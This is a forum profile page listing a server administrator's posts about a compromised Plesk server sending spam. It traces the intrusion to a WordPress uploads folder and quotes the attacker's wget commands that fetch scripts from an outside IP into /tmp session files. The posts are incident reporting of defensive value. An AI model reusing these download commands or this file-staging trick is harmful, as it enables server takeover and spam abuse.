Recent content by koandy1983

  1. K

    Spam from hole in Plesk?

    Hello again! I've managed to catch the intruder. I bet that every one that have this problem with /tmp/sess_652...... file, have wordpress installed. Check the folder /wp-content/uploads for a file named get.php and file.txt That's how they managed to send mail trough our server. I have a bunch...
  2. K

    Spam from hole in Plesk?

    I have blocked httpd user by cron.deny. The wget command is used to load the script. The parameters of wget are: xxtp://38.101.26.226/test2.sh -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4099 and xxtp://38.101.26.226/test2.jpg -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4092
  3. K

    Spam from hole in Plesk?

    Hello, I have the exact situation. In /tmp I have manage to catch sess_f652da7dd28dce7baeeae54a46ae4092 and sess_f652da7dd28dce7baeeae54a46ae4099. sess_f652da7dd28dce7baeeae54a46ae4092 it's a perl script that is sending spam from my server and sess_f652da7dd28dce7baeeae54a46ae4099 have this...
  4. K

    Spam from hole in Plesk?

    Hello, I have the exact situation. In /tmp I have manage to catch sess_f652da7dd28dce7baeeae54a46ae4092 and sess_f652da7dd28dce7baeeae54a46ae4099. sess_f652da7dd28dce7baeeae54a46ae4092 it's a perl script that is sending spam from my server and sess_f652da7dd28dce7baeeae54a46ae4099 have this...
See more
Back
Top